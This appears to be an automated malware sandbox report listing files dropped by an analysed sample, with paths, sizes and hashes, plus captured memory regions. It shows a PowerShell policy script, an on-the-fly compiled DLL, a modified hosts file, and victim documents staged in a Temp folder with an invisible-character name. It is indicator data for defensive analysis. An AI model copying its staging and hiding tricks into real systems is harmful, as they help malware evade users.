d2b7c6997b4bd390257880a6f3336e88d1dd7159049811f8d7c54e3623e9b033e18e8922422869c81de72fc8c10890c173d8a958d192dd03bfc57cffaea1ac7b

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4njk0f2y.tko.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\rpyeyxtb\rpyeyxtb.dll

Filesize
4KB

MD5
97323e0f0776c1053e64d301c8fcc40c

SHA1
66cec791ca0b542bdedb38b888558dcf1dca6646

SHA256
852de6129ff7e0c21dd6a153bb4317e57425de777634aea54c8aaa1218def770

SHA512
8c8ad42df11900bf10f4d3bac7591d490c1b5a1908ee3e152e9912439485a61412daa506ecf70a6bfefb2e1ee466e1f94cbdece531beea5c116ceb3eb6327c6b

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌   \Common Files\Desktop\BackupMove.ttf

Filesize
399KB

MD5
e6a32e5919b6ce479dbad879165fefc5

SHA1
410cb57378cf0a56cefdf654daa1b8a8c0d76503

SHA256
d112721ecbfe1ebb0aae487e2a94cb7e9c64d7bb206e3c7d27f00388ffc100c4

SHA512
d674475f5c58c34646799dcaeffccb53dcb8b42f96631f12d666212105202cbf6aa4a521058acab4be0bc758d476f93bd3a4585ade686161ea07cd70a41a90e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌   \Common Files\Desktop\LockRedo.xlsx

Filesize
12KB

MD5
64acddf94a7427a6c30e2b1dd052be57

SHA1
c803c94bd405840affba99a797709ad3d9c83f28

SHA256
41ac4aa832849f1bdcba2ecdc762605492ec55821863b50cc7496b40a1b4f073

SHA512
3585f9c55c43bf042a43665ce4d2951e5892d5275d4089fa03b45351eff8abbbb64a37e211e1053e81287ec147bf55467bdc3782fbdefd2a016221686b90512e

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌   \Common Files\Desktop\NewInvoke.mp3

Filesize
1.2MB

MD5
88b8d512b35c2db701497bf2df98d935

SHA1
4a23b18ecad353e5d52d6002eeb2089312442c6c

SHA256
a5d456b0b6b56f426740d916158ad9f7d359f656e4d35836b7d237a0d6b46042

SHA512
741b80360e17fe005b2884ce3242449d65c2dfcae2d79325ac26746740d23f0640473527a96d315d90b5f07783b794ef3fa908b41d8081580f3d7755f3fae47e

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌   \Common Files\Desktop\RemoveUndo.xlsx

Filesize
706KB

MD5
1e5a2c5e5277aa005414dd058221811b

SHA1
7af3e7b32964bdcc6c784aa6763de5c284149196

SHA256
26700e1da7da1111e0199c06716854f743d80db9aa731baf438450787a6d246b

SHA512
bdcc43eac5f3d758eb7ebcc5a25e7c0507e0bf210465176933644e98196cac9f59c0c16fb72eca3cadfcda0a42fe655d1be5336304d73a7e9826a5dfae06642c

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌   \Common Files\Desktop\SendMerge.xlsx

Filesize
10KB

MD5
1d737aa12182e64921bf8e088822a365

SHA1
3e300edd06783c869a63b0d4c9df030eec7f80cb

SHA256
1eb1f93325d18875ca92fd833294be85e75899a4b64b395252eb8fa4fa1bf421

SHA512
6a855861a7f71c4e12c82ae037071427c15ba60f487f6a3d6b4f93317a089309dade2815f4c513c516144608cb14aa356b6e4d5f47d77d43b292339de964a84e

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌   \Common Files\Desktop\SplitBlock.mp4

Filesize
614KB

MD5
fc39b6c446cfca5eb1b81219dde136dd

SHA1
005d0d04ae0bb47c7a72bf4d3ba50d504c902217

SHA256
3055063fb8c598306afdfe858cab32163aec501fde934ab90f6d23f07c5f81a2

SHA512
b0eb8f227fa4f0c18086033c25e1d02fba95839cc003a457afd0f6c30be117daa2f44e8215eda90af43913f29eef855c9dda8c5720fa579c3e04ae7ed63f8865

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌   \Common Files\Desktop\WaitSave.docx

Filesize
16KB

MD5
2afd67233ac19a284dddd535f47455ab

SHA1
68b04295c77eed620201e4273e15580d84f3d4fd

SHA256
9942a9e3f6a3de8bead1a85996c688e02d4fd5abeba73bfa78bd6ad1db5c6c68

SHA512
7732bbeace39858ec03cad1b0b10c419c6fcbf027a40005f6f0d33419ff8529473cd2aa2cce58371df03b7e86a950a1a14d845f489aece56dc412bb4d76fcd58

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌   \Common Files\Documents\GrantCheckpoint.xlsx

Filesize
302KB

MD5
c78374b44d645ac2633679879cb2b691

SHA1
1e399fedb8c7706eee81ef87c4c9a2bc8207458b

SHA256
626dee43448f65c0923e57a7898f1cacd4f2798a81f50c85971e1ea5fd7650d2

SHA512
6779ffb3387aa051a9e383a887a344a1854b46467b81a75f1becd61dd6b1f04a8733612cf7b721e6c17fe89c09f325b4f4adbd804f9c2454ed576239c6072dca

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌   \Common Files\Documents\ProtectWrite.doc

Filesize
204KB

MD5
57224f2d96198a64593778abde102d70

SHA1
5a9db041166158e1a434d72033ca26a2e9a63fde

SHA256
ca088e933d284d8f54386d4ac4b7f1ffcd26e5a9b9e5454d4f438fe5d188e4fb

SHA512
274a4901109a3e539d16726d5a6c07f7d566071b3a530069008ba590b3eb97cd7d39c4346e54d6b03659d7ff2c858924cc730e9783b5dd1a5884e2ebb904d1af

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌   \Common Files\Documents\RegisterResize.xlsx

Filesize
331KB

MD5
c7697d67ede97c9d8ed396f8340d8e3b

SHA1
45903fca46b60a9b0b0ea77e99657ade0304348e

SHA256
08c1344fb9274b735e47987f8c80b5b59c055ea9d38f54fe11e8ca11efe90651

SHA512
61b23a259a833a1077c8fb5ebdbfb39f3bd72510752189b9691e072e7a6c163ae962ab9a9fe7fe7df1904d2ef678c5e17a83dec127efa9a29e53c2571d81a8c5

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌   \Common Files\Documents\UnlockRead.xlsx

Filesize
428KB

MD5
3dcca10c52780f68f557e0334784c500

SHA1
85db4b48d8a3e6525c8544e62add4e37e82b7e4b

SHA256
db0f695d50a232e83f69ee218ee527f5c9ceeb53fb9915f6bcde6dd2a8049724

SHA512
5d15cf3c2002a713846bc9eea1f89877ef2fb8ecfd9a0c29a4f500f97bc2893aa6a776a0828d735bbb1cd086245d782839b60f774fd8825e59126a54a4f63305

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‌   \Common Files\Downloads\EditWait.docx

Filesize
443KB

MD5
663a65d5fd2d4b274de65c6db2a7fe18

SHA1
cb73fd75caf5170d33e3c74dc01ae26c024128fc

SHA256
3e473a0091fb7be84f7a60f5b7508e92bff4192daff56ad1ccc4b14f6b709db1

SHA512
459d07ef4179664cf3905dc9940eaad023787edc266b748b2c44bd2b0bad5ab5b37d0a74ceacce5959e85a53609dcfe76d36a9edf790e18bf11639044adb87fd

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
f99e42cdd8b2f9f1a3c062fe9cf6e131

SHA1
e32bdcab8da0e3cdafb6e3876763cee002ab7307

SHA256
a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0

SHA512
c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\rpyeyxtb\CSC2BDAFA8D9A9145B79B1E5DFA35BF165D.TMP

Filesize
652B

MD5
b3fce1816412a2b52d44f2cec58117cc

SHA1
5736e4d23d2fde5ead909f0a423318070338cd55

SHA256
c80c87c9416bc9e77a8cc52dbea1e4cc9ed22fb7d798d7da547bf176286cf866

SHA512
419265bc5925b8e52284c93116d1e9117234b7c2315b6d29051000235d058d1a95975fb7dbe12d3e6f080737df071df956db7f88fb511aa5a528d508ac982056

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\rpyeyxtb\rpyeyxtb.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\rpyeyxtb\rpyeyxtb.cmdline

Filesize
607B

MD5
b9b4a538560cec5c284b5f0dc2cc8b6c

SHA1
8f352767fc80dca9a573daf952e6ce1036b8994e

SHA256
6faba4e63bdbbf40832d0cb369bcccf4b2b1976690595abaca498ee4b9cc7ef3

SHA512
879220b6b05d1db204340ceb68b43f17af2a35c2437986c091d16236913243fdf0a09daced8ba8f420e092d35b212d5ae445bcc212a37a7275f60e2d04d39923

Download Submit
memory/1272-31-0x00007FFD5D5A0000-0x00007FFD5D5C4000-memory.dmp

Filesize
144KB

Download
memory/1272-56-0x00007FFD5EAA0000-0x00007FFD5EAB9000-memory.dmp

Filesize
100KB

Download
memory/1272-170-0x00007FFD5AA50000-0x00007FFD5AA69000-memory.dmp

Filesize
100KB

Download
memory/1272-108-0x00007FFD5D4D0000-0x00007FFD5D4EF000-memory.dmp

Filesize
124KB

Download
memory/1272-344-0x00007FFD563B0000-0x00007FFD56725000-memory.dmp

Filesize
3.5MB

Download
memory/1272-81-0x00007FFD5EAA0000-0x00007FFD5EAB9000-memory.dmp

Filesize
100KB

Download
memory/1272-82-0x00007FFD56BE0000-0x00007FFD56CF8000-memory.dmp

Filesize
1.1MB

Download
memory/1272-76-0x00007FFD5AA00000-0x00007FFD5AA14000-memory.dmp

Filesize
80KB

Download
memory/1272-78-0x00007FFD5AA70000-0x00007FFD5AA9D000-memory.dmp

Filesize
180KB

Download
memory/1272-345-0x00007FFD60170000-0x00007FFD6017F000-memory.dmp

Filesize
60KB

Download
memory/1272-79-0x00007FFD5AF80000-0x00007FFD5AF8D000-memory.dmp

Filesize
52KB

Download
memory/1272-74-0x00007FFD563B0000-0x00007FFD56725000-memory.dmp

Filesize
3.5MB

Download
memory/1272-217-0x00007FFD5F4D0000-0x00007FFD5F4DD000-memory.dmp

Filesize
52KB

Download
memory/1272-73-0x00000239B77D0000-0x00000239B7B45000-memory.dmp

Filesize
3.5MB

Download
memory/1272-274-0x00007FFD5AA20000-0x00007FFD5AA4E000-memory.dmp

Filesize
184KB

Download
memory/1272-276-0x00007FFD57050000-0x00007FFD57108000-memory.dmp

Filesize
736KB

Download
memory/1272-277-0x00000239B77D0000-0x00000239B7B45000-memory.dmp

Filesize
3.5MB

Download
memory/1272-70-0x00007FFD47E80000-0x00007FFD482EE000-memory.dmp

Filesize
4.4MB

Download
memory/1272-71-0x00007FFD5D5A0000-0x00007FFD5D5C4000-memory.dmp

Filesize
144KB

Download
memory/1272-72-0x00007FFD57050000-0x00007FFD57108000-memory.dmp

Filesize
736KB

Download
memory/1272-66-0x00007FFD5AA20000-0x00007FFD5AA4E000-memory.dmp

Filesize
184KB

Download
memory/1272-64-0x00007FFD5F4D0000-0x00007FFD5F4DD000-memory.dmp

Filesize
52KB

Download
memory/1272-62-0x00007FFD5AA50000-0x00007FFD5AA69000-memory.dmp

Filesize
100KB

Download
memory/1272-60-0x00007FFD56930000-0x00007FFD56AA1000-memory.dmp

Filesize
1.4MB

Download
memory/1272-58-0x00007FFD5D4D0000-0x00007FFD5D4EF000-memory.dmp

Filesize
124KB

Download
memory/1272-109-0x00007FFD56930000-0x00007FFD56AA1000-memory.dmp

Filesize
1.4MB

Download
memory/1272-54-0x00007FFD5AA70000-0x00007FFD5AA9D000-memory.dmp

Filesize
180KB

Download
memory/1272-48-0x00007FFD60170000-0x00007FFD6017F000-memory.dmp

Filesize
60KB

Download
memory/1272-25-0x00007FFD47E80000-0x00007FFD482EE000-memory.dmp

Filesize
4.4MB

Download
memory/1272-292-0x00007FFD563B0000-0x00007FFD56725000-memory.dmp

Filesize
3.5MB

Download
memory/1272-313-0x00007FFD47E80000-0x00007FFD482EE000-memory.dmp

Filesize
4.4MB

Download
memory/1272-319-0x00007FFD56930000-0x00007FFD56AA1000-memory.dmp

Filesize
1.4MB

Download
memory/1272-318-0x00007FFD5D4D0000-0x00007FFD5D4EF000-memory.dmp

Filesize
124KB

Download
memory/1272-314-0x00007FFD5D5A0000-0x00007FFD5D5C4000-memory.dmp

Filesize
144KB

Download
memory/1272-329-0x00007FFD47E80000-0x00007FFD482EE000-memory.dmp

Filesize
4.4MB

Download
memory/1272-357-0x00007FFD56BE0000-0x00007FFD56CF8000-memory.dmp

Filesize
1.1MB

Download
memory/1272-356-0x00007FFD5AF80000-0x00007FFD5AF8D000-memory.dmp

Filesize
52KB

Download
memory/1272-355-0x00007FFD5AA00000-0x00007FFD5AA14000-memory.dmp

Filesize
80KB

Download
memory/1272-354-0x00007FFD57050000-0x00007FFD57108000-memory.dmp

Filesize
736KB

Download
memory/1272-353-0x00007FFD5AA20000-0x00007FFD5AA4E000-memory.dmp

Filesize
184KB

Download
memory/1272-352-0x00007FFD5F4D0000-0x00007FFD5F4DD000-memory.dmp

Filesize
52KB

Download
memory/1272-351-0x00007FFD5AA50000-0x00007FFD5AA69000-memory.dmp

Filesize
100KB

Download
memory/1272-350-0x00007FFD56930000-0x00007FFD56AA1000-memory.dmp

Filesize
1.4MB

Download
memory/1272-349-0x00007FFD5D4D0000-0x00007FFD5D4EF000-memory.dmp

Filesize
124KB

Download
memory/1272-348-0x00007FFD5EAA0000-0x00007FFD5EAB9000-memory.dmp

Filesize
100KB

Download
memory/1272-347-0x00007FFD5AA70000-0x00007FFD5AA9D000-memory.dmp

Filesize
180KB

Download
memory/1272-346-0x00007FFD5D5A0000-0x00007FFD5D5C4000-memory.dmp

Filesize
144KB

Download
memory/2712-204-0x000001EBBC450000-0x000001EBBC458000-memory.dmp

Filesize
32KB

Download
memory/4296-93-0x000002A9B59B0000-0x000002A9B59D2000-memory.dmp

Filesize
136KB

Download